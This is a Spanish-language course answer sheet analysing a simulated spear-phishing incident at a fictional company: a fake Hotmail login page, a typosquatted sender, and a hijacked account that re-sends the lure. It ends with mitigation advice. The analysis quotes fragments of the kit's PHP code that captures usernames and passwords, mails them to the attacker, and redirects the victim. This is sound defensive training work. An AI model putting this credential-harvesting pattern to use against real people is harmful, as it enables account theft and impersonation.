Módulo:

Hoja de respuestas
Ciberinteligencia

Nombre y apellidos William Enrique Quezada Ágreda

Fecha entrega 04/05/2020

Trabajas en el equipo de Análisis e Inteligencia de ciberseguridad en la

empresa Ficticy SL, una multinacional dedicada a la venta de viviendas.

Caso 1

El día 23 de noviembre de 2017 a las 10:00 am recibes un correo electrónico

desde una cuenta de correo corporativa de otro país, en el que se facilita un
enlace a un sitio web sospechoso.
La cuenta desde la que se envía ese mensaje es: “m.walker.franch@ficticy.de”.
El asunto del correo es: FW: Validate Email Account
El cuerpo del mensaje es:
This is to notify all employees that we are validating active accounts. Please,
confirm that your account is still in use by clicking the validation link below:
Validate Email Account
Cheers,
Al comentarlo con el resto de compañeros del equipo, todos ellos explican que
han recibido el mismo email. A continuación, empiezan a llegar incidencias de los
empleados de la compañía reportando la recepción del email, indicando que les
parece sospechoso. Se cuenta con los siguientes recursos:
Logs de emails recibidos por la cuenta “m.walker.franch@ficticy.de”.
Código del sitio web (directorio “caso 1”).

Análisis de Evidencias

Revisando los recursos facilitados, y al analizar, tanto las imágenes, como el

archivo “index.code1.html”, se pudo observar que se ha tratado de suplantar la
página web del Hotmail (http://www.hotmail.com), con la intención de capturar
las credenciales (username y password), del acceso al correo corporativo de los
empleados de esta empresa, para su posterior envió al archivo php
(method="POST" action="post.php").
En el archivo “post.php”, una vez analizado el código, se pudo observar como el
atacante, mediante este archivo, recoge los datos ($message .= "Email: ".
$_POST['username']"; $message .= "Password : ".$_POST['password'];), ingresados
en la página web phishing, y los envía (mail($recipient,$subject,$message,
$headers)), con varios datos más, a una cuenta de correo especificada por él
($recipient = "ejercicio_modulo1@ciberinteligencia.es"), para la posterior
recepción de los mismos. Además, podemos ver en la última línea de código,
como una vez capturados los datos, el Phishing redirección a la página original
de Hotmail (header("Location: http://www.hotmail.com/");), esto con el fin de no
levantar sospechas en las víctimas.

También se pudo evidenciar en los Logs de acceso, como el atacante utiliza por
primera vez la cuenta robada (con IP 77.72.83.26), el 23 de noviembre a las
09:45, siendo partir de aquí que empieza a ser utilizada esta cuenta para sus
propósitos.
Por último, en el log-mail, se pudo descubrir que el atacante envió por primera
vez su Phishing (con el asunto FW: Validate Email Account) desde una cuenta
llamada verify@microfoft.com, justo unos minutos antes (09:40), que empezara
a usar la cuenta robada. Siendo así que, se confirma que una vez conseguido los
datos de acceso de la cuenta robada, el atacante procedió a renviar el phishing
inmediatamente (09:51), a los demás empleados de la empresa
(m.will.smith@ficticy.us, l.stephan.martin@ficticy.co.uk, l.martin.fierre@ficticy.es,
j.rodriguez.maceda@ficticy.es, s.mick.resce@ficticy.nl)

Respuestas a las preguntas planteadas

Identificar qué tipo de incidente se ha podido producir en este caso.

En este caso, mediante el análisis de los recursos obtenidos para el estudio del
mismo, se pudo observar que se suscitó, un claro incidente de una suplantación
de página web, suplantación de una identidad y, el robo de datos sensibles. Una
vez obtenidos estos datos (para el acceso a la cuenta corporativa), se utilizó una
campaña de distribución de phishing, concretamente de tipo Spear phishing, ya
que el objetivo del atacante, han sido los empleados de la empresa Ficticy SL.
¿Cómo se ha podido producir el suceso?

Este suceso se produjo, por el engaño que hizo el atacante a su víctima en el

primer intento (a la cuenta m.walker.franch@ficticy.de). El atacante, utilizó una
técnica llamada typosquatting, ya que el dueño de la cuenta robada, recibió el
primer email desde una cuenta llamada verify@microfoft.com, la cual
haciéndola pasar por una cuenta de dominio Microsoft, pudo así, conseguir que
la víctima cayera de lleno en el Phishing.

Cabe resaltar que el atacante, además de utilizar la técnica antes mencionada,

también se valió de importantes detalles o artimañas, como el del asunto, que
hacía referencia a una “validación de cuente de email”, además del contenido del
mensaje, que decía: “Esto es para notificar a todos los empleados que estamos
validando cuentas activas. Por favor, confirme que su cuenta todavía está en uso
haciendo clic en el enlace de validación a continuación:” Siendo así que logro
engañar de lleno a su víctima, consiguiendo así su cometido.

Una vez que el atacante se hizo con las credenciales de la cuenta corporativa de
la víctima, mediante su primer phishing enviado a este, a las 09:40 AM; el
atacante, accedió de manera ilícita a esta y utilizó los contactos de la cuenta
víctima, para minutos más tarde, proceder a enviar la misma campaña de
distribución de phishing. Todo esto, con la clara intención de buscar conseguir
una mayor credibilidad a su Phishing, realizando estos envíos desde una cuenta
legitima y de la misma empresa.

¿Dónde se envían los datos comprometidos?

Analizando el código del sitio web (archivos HTML y PHP), se puede encontrar
que, en el código HTML, se hace el envió de los datos ingresados por la víctima
en los box (username y password) de la página web phishing, a un archivo php
(post.php); y este segundo archivo a su vez, dentro de su código tiene una
orden para capturar y enviar estos datos a un correo electrónico,
específicamente a ejercicio_modulo1@ciberinteligencia.es ($recipient =
"ejercicio_modulo1@ciberinteligencia.es"). Con su respectivo asunto ($subject =
"Accounts nPost")

¿Qué cuentas se han podido ver comprometidas? ¿Cómo podemos

identificarlas?

Se sabe que la cuenta comprometida es m.walker.franch@ficticy.de, ya que es

desde esta cuenta, una vez que el atacante se hizo con las credenciales de
acceso, que se envía el email malicioso a los demás empleados. Todas las
cuentas que recibieron este correo malicioso, incluso la comprometida, lo
recibieron con el asunto “FW: Validate Email Account”.

Conclusión del caso

En conclusión, el atacante haciendo uso de sus elevados conocimientos de

Phishing y programación, entre otros, desarrollo una página web que lograra
suplantar la original de Hotmail. Con el fin de obtener las credenciales de
acceso a cuentas de personas potenciales dentro de una empresa.

Mediante un email muy bien organizado y estructurado, ya sea por la creación

de la cuenta origen usada, así como el contenido del mensaje, incluido el link
hacia el Phishing, logró engañar a su víctima y comprometió la cuenta
corporativa de este; para de esta manera, poder distribuir el Phishing, con
mayor credibilidad al tratarse de una cuenta original y propia de la empresa.
También se pudo confirmar la efectividad del Phishing haciendo una prueba real
en nuestros laboratorios.
Recomendaciones
Como se pudo observar en este caso, uno de los eslabones más sensibles
dentro de una organización, son los empleados y usuarios en general,
principales objetivos de los atacantes a la hora de planear y desarrollar un
ataque de este tipo. Es por eso que, para evitar, en lo más posible este tipo de
incidentes, lo primordial es una buena educación por parte de la empresa hacia
sus empleados, haciéndoles conocer cómo operan este tipo de atacantes y las
metodologías que usan, que, aunque parecieran muy obvios o evidentes las
técnicas aquí observadas, muchas veces logran tener un gran éxito.

Plan de Mitigación

Si bien es cierto, como se mencionó anteriormente, que la mejor estrategia es la

educación al personal en general, tanto para evitar como para mitigar el
impacto de un posible ataque de este tipo, también se debe identificar los
posibles objetivos potenciales de phishing, ya que este tipo de ataques,
generalmente tienden a apuntar a ejecutivos dentro de la empresa que tienen
la autoridad o poder dentro la misma.

También se debe contar con un plan de respuesta, para, si se identifica alguno

de estos sitios, tratar de eliminar el dominio lo antes posible. Esto, la empresa
podría hacerlo por sí mismo, contactando con el dueño del dominio suplantado,
pero también, si lo amerita el caso, contactar con alguien que pueda hacerlo en
su nombre. Así mismo, un plan de comunicación, para informar a todo su
personal de trabajo del ataque que se está suscitando y así poder evitar la
propagación del mismo.

Por último, no solo para evitar la infección, sino también su propagación una
vez infectado algún empleado, se debería usar filtros web y de correo
electrónico, entre otros, ya que, con una correcta aplicación y configuración de
estos, se puede bloquear los ataques de phishing, los remitentes falsificados, los
tipos de archivos maliciosos, los URL incorrectos, etc.

El plan de continuidad

Para que la empresa pueda responder favorablemente lo más pronto posible,

una vez sufrido un incidente de este tipo, debió haber diseñado y elaborado un
plan de respuesta anti incidentes, donde se debe contemplar la valoración de
daños causado, perdidas ocurridas y personal implicado o comprometido, entre
otros.